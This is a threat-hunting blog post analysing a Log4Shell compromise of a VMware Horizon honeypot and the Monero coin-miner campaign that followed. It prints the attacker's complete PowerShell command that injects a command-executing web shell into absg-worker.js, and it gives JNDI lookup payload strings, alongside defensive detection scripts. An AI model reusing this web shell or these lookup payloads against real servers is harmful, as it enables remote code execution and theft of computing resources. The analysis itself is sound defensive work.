Log4Shell — Too Close to Home

Kr8t0s
Jan 28, 2022

Executive Summary
An advisory shared by VMware states: “Critical vulnerabilities in Apache Log4j identified by CVE-2021-44228 and CVE-2021-45046 have been publicly disclosed which impact VMware products”.

VMware Horizon is a virtual desktop product and, as such, is used by organizations globally to provide remote desktop sessions to users via a web browser.

Following the shared advisory, I decided to set up a honeypot of a vulnerable VMware Horizon, version 7.13.0, to identify any likely Indicators of Compromise (IOCs) given the reported threats associated with this zero-day vulnerability. The honeypot was set up on 15th December 2021 and made public on 17th December 2021 with the following configuration:

OS: Windows Server 2016

VMware Horizon: Version 7.13.0

EDR|Antivirus

Note: Affected servers will be addressed as “192.168.2.2” and URL as “example.com”.

Threat Overview

On January 23rd 2022, I decided to conduct a threat hunting exercise, hoping some attacker had taken the bait on my vulnerable VMware Horizon. You guessed it: an unknown threat actor/group was observed to have exploited the honeypot (192.168.2.2) from its internet-accessible URL: <example.com>. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon.

The attacker was confirmed to have gained access to <192.168.2.2> on December 23rd, 2021 at 4:41:45PM GMT+1.

The attacker was also observed deploying an elusive “Monero” coin miner on the affected server.

Attack Overview

Detailed Findings

1. Initial Validation

For a proof of concept, <example.com> was tested for Apache Log4Shell Vulnerability using cURL:

DNS Callback

The above DNS interaction confirms the server is vulnerable to Log4Shell.

Let me explain how this works:

Log4Shell is the result of a feature in the Log4j library failing to properly validate incoming data. Log4j uses Message Lookup Substitution (MLS) to define a number of ‘lookup’ functions that allow Log4j to alter content as it is being logged and is typically used to dynamically edit certain logging tags. MLS is triggered whenever content with the form ${example} appears in strings to be logged.

MLS uses Java Naming and Directory Interface (JNDI), a directory service API that allows Java clients — such as Log4j — to find and execute resources. JNDI is able to pull content directly from outside domains using several network protocols. By triggering a JNDI lookup over Lightweight Directory Access Protocol (LDAP) to a specific domain in the form ${jndi:ldap://example.com}, Log4j will download and execute content hosted on that domain. Once an outdated version of log4j sees this string ${jndi:ldap://example.com:12345/}, it will perform a DNS lookup to get the IP address of “example.com”. If this happens, the asset is considered vulnerable.
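The detection side of the lookup-string mechanism described above, as an added example that is not part of the original post: a small Python scanner that decodes URL-encoding, collapses the nested `${lower:}`, `${upper:}` and `${x:-default}` lookups attackers use to disguise the `jndi` keyword, and then flags any log line that still carries a `${jndi:` lookup. The log lines are constructed for the example; the log format and obfuscation forms are assumptions, not captures from the honeypot.

```python
import re
from urllib.parse import unquote

# Lookup forms used to disguise the "jndi" keyword (patterns written for this
# example, based on Log4j's lower/upper lookups and the ":-" default syntax).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 16) -> str:
    """Undo URL-encoding, then collapse nested lookups innermost-first until stable."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so a pathological line cannot spin forever
        before = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed web-server log lines: one benign, four carrying the lookup in
# plain, nested, URL-encoded and default-lookup forms, then one benign "${" line.
SAMPLE_LOGS = [
    '10.0.0.5 - - [23/Dec/2021:16:41:45 +0100] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Dec/2021:16:41:45 +0100] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://example.com:12345/a}"',
    '10.0.0.9 - - [23/Dec/2021:16:41:46 +0100] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-l}dap://example.com/x}"',
    '10.0.0.9 - - [23/Dec/2021:16:41:47 +0100] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fexample.com%2Fa%7D HTTP/1.1" 200',
    '10.0.0.9 - - [23/Dec/2021:16:41:48 +0100] "GET / HTTP/1.1" 200 "-" "${${env:NOT_SET:-j}ndi:rmi://example.com/b}"',
    '10.0.0.7 - - [23/Dec/2021:16:41:49 +0100] "GET /?q=${user} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOGS):
        print(f"line {n}: {norm}")
```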

The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:

2. Analysis and Revelation

The malicious payload was first detected on December 23rd 2021 at 4:41:45PM GMT+1 attempting to perform the following actions depicted in the image below:

  • Attempt to open itself for modification
  • Attempt to enable executable in memory
  • Attempt to find “C:\Windows”
  • Attempt to list all processes
  • Attempt to create a viewable window
  • Attempt to pass commands to the service control manager

Malicious Payload Breakdown

powershell -c “$path=gwmi win32_service|?{$_.Name -like “””*VMBlastSG*”””}|%{$_.PathName -replace ‘“””’, ‘’ -replace “””nssm.exe”””,”””lib\absg-worker.js”””};

The executed command invokes Get-WmiObject on win32_service, returning the services whose names contain ‘VMBlastSG’. It takes the file path of that service, replaces the instance of ‘nssm.exe’ with ‘lib\absg-worker.js’ and writes this path to $path, thereby identifying the location of the ‘absg-worker.js’ file for the targeted VMware Horizon instance.

$expr=”””req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes(‘lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb’)) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require(‘child_process’).execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers[‘data’], ‘base64’).toString(‘ascii’)`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;”””;

This writes a code block to $expr that listens for any web request containing a specific, hardcoded string in the URI before executing arbitrary commands contained in the ‘data’ header. The output is delivered to the attacker via ‘replyError’ for requests containing the specified string; otherwise, a standard error message is returned.

(Get-Content $path)|ForEach-Object {$_ -replace “””req.connection.end\(\)\;”””, $expr}|Set-Content $path;Restart-Service -Force VMBlastSG

The next command executed reads the file at the path stored in $path (absg-worker.js) and, for each line, replaces any instance of “req.connection.end();” with the code block stored in $expr described above, thereby injecting the web shell. The altered ‘absg-worker.js’ will typically contain the attacker’s specified string:

In this case, the attacker deleted the content of “absg-worker.js”; we would assume this was in an effort to erase evidence of the compromise.

As can be seen in the image above, a successful attempt to modify another running process occurred at exactly the same time as the absg-worker.js content was erased. PS: you’re free to make of that activity what you will.

The “VMBlastSG” service is then forcibly restarted to initiate the listener.

Once established, the listener executed arbitrary commands received in crafted web (HTTP / HTTPS) requests which contained the hardcoded string (key) in the URI of the request. The commands are stored as a header object (named ‘data’) in the crafted requests.
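A file-level check for the injected listener described in this section, written for this post as an added example (not the author’s tooling): it classifies the content of absg-worker.js as clean, web shell or emptied (the wiped-file case noted above), and pulls out the hardcoded URI key so it can be searched for in web logs. The two sample file contents are constructed; the key value is a placeholder and the benign handler shape is an assumption.

```python
import re
from pathlib import Path

# Strings characteristic of the injected block: a child_process call fed from the
# 'data' request header. The samples below are constructed, not honeypot captures.
WEBSHELL_MARKERS = (
    "require('child_process')",
    ".execSync(",
    "req.headers['data']",
    "Buffer.from(req.headers",
)
# The listener only fires for URIs containing a hardcoded key; extracting it gives
# a string to hunt for in web server access logs.
_KEY_RE = re.compile(r"String\(req\.url\)\.includes\('([^']+)'\)")


def inspect_worker_source(source: str) -> dict:
    """Classify absg-worker.js content as 'clean', 'webshell' or 'emptied'."""
    if not source.strip():
        # An empty worker script matches the evidence-wiping seen on the honeypot.
        return {"verdict": "emptied", "markers": [], "keys": []}
    markers = [m for m in WEBSHELL_MARKERS if m in source]
    keys = _KEY_RE.findall(source)
    verdict = "webshell" if markers or keys else "clean"
    return {"verdict": verdict, "markers": markers, "keys": keys}


def inspect_worker_file(path: str) -> dict:
    """Read the worker script from disk (tolerating odd encodings) and classify it."""
    return inspect_worker_source(Path(path).read_text(encoding="utf-8", errors="replace"))


# Constructed stand-in for the original handler around req.connection.end();
CLEAN_SAMPLE = """function onRequest(req, res) {
\tif (bad) {
\t\treplyError(req, res, 400, 'bad request');
\t\treq.connection.end();
\t}
}
"""

# Constructed injected variant: one extra branch keyed on a placeholder URI substring.
INJECTED_SAMPLE = CLEAN_SAMPLE.replace(
    "req.connection.end();",
    "req.connection.end();\n\t\tif (String(req.url).includes('PLACEHOLDER_KEY')) "
    "{ require('child_process').execSync(/* command from req.headers['data'] */); }",
)

if __name__ == "__main__":
    print(inspect_worker_source(CLEAN_SAMPLE)["verdict"], inspect_worker_source(INJECTED_SAMPLE))
```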

For additional information on Log4Shell, visit:

https://blog.viettelcybersecurity.com/the-log4shell-vulnerability-may-have-been-exploited-since-august-2021/

https://digital.nhs.uk/cyber-alerts/2022/cc-4002

Installation and Exploitation

Following the above breach, the attacker/threat actor was observed executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software (coin miner) on <192.168.2.2>.

Encrypted PowerShell payload to download the coin miner propagator script (mad_micky.bat)
Decrypted PowerShell Command
Execution Triage

Following the previously reported malicious injection via “ws_TomcatService.exe” by the attacker/threat actor during the initial stage, the “ws_TomcatService.exe” service can be observed spawning malicious executions of cmd.exe and powershell.exe.

Malicious Bat Script Analysis

Attacker’s Crypto Wallet Address

The review of the bat script (mad_micky.bat) revealed the attacker’s crypto wallet address. Using a hash identifier tool (https://hashes.com/en/tools/hash_identifier) I was able to identify and confirm the type of crypto wallet address: Monero.

Hash Identifier

Using the above wallet address, I was able to access the attacker’s Monero crypto wallet.

The threat actor/attacker has 395 servers currently mining the Monero cryptocurrency, the majority of which were observed to be VMware Horizon servers from multiple corporate environments/organizations.

Based on the above number of servers, the attacker is estimated to rake in £31.67 (Pounds) a day.

Downloading xmrig.exe and 7za

Back to our analysis: the script in the screenshot above downloads xmrig.zip, then downloads 7za as a .txt file and renames it to 7za.exe in order to extract and execute xmrig.exe.

Mining Hash rate

The script defines the mining hash rate to ensure the resources on <192.168.2.2> are not overwhelmed and, by so doing, there is no noticeable drag on the server. PS: your guess is as good as mine; who’s gonna know, no one is gonna know.

Redundancy to Evade AV

If the version of xmrig.exe downloaded is removed by antivirus, the script goes to a defined GitHub URL to download an updated version likely to evade antivirus detection. Mad_micky.bat script was observed to have many contingencies to ensure an updated coin miner tool is downloaded, executed and cleaned up after successful execution.

In one instance, one of the additional downloaded scripts attempts to use System.Net.WebClient to download a rudimentary backdoor, “Logback.exe”.

Backdoor, miner configuration, cleanup bat script

If the script is running under “system” access, a WMI object namespace is created and a scheduled task is registered to download and execute a script from Pastebin in order to maintain persistence.

Note: the scripts have since been taken down from Pastebin.

CleanUp

The mad_micky.bat script does a good job of accounting for multiple redundancies and cleanup. As can be seen in the image below, the attacker can be likened to a cat (cleaning up after themselves).

Clean.bat

Conclusion

The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This vulnerability was exploited to deploy a sophisticated coin miner on the affected server.

Further investigations did not detect any other activity carried out by the attacker/threat actor.

Appendix

Indicators of Compromise


Detection Rule

Recommendations

· Upgrade VMware Horizon to Horizon 7.13.1

· Deploy the workaround on vCenter Server pending patch release

· Deploy affected server behind a WAF

Kr8t0s

Threat Hunter.. There's no threat hunt without Intelligence.